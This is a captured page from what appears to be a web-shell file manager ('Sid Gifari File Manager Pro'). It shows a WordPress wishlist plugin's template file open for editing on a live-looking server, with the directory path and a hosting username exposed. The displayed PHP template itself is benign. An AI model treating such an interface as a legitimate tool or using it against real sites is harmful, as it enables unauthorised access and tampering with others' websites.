🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-19 13:01:29 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
thedasstores.com
/
wp-content
/
plugins
/
ti-woocommerce-wishlist
/
views
📍 /home/therahul/thedasstores.com/wp-content/plugins/ti-woocommerce-wishlist/views
🔄 Refresh
✏️
Editing: section-group-style.php
Writable
<?php /** * The Template for displaying admin section group for style this plugin. * * @since 1.0.0 * @package TInvWishlist\Admin\Template */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } ?> <tbody <?php echo $extra; // WPCS: xss ok. ?>> <tr class="tinvwl-bodies-border"> <td> <div class="tinvwl-inner"></div> </td> </tr> <tr> <td> <div class="tinvwl-inner"> <?php if ( $show_names && $title ) : ?> <h2><?php echo $title; // WPCS: xss ok. ?></h2> <?php endif; ?> </div> </td> </tr> <tr> <td> <div class="tinvwl-inner"> <div class="form-horizontal"> <div class="form-group"> <?php echo $fields; // WPCS: xss ok. ?> </div> </div> </div> </td> </tr> </tbody>
💾 Save Changes
❌ Cancel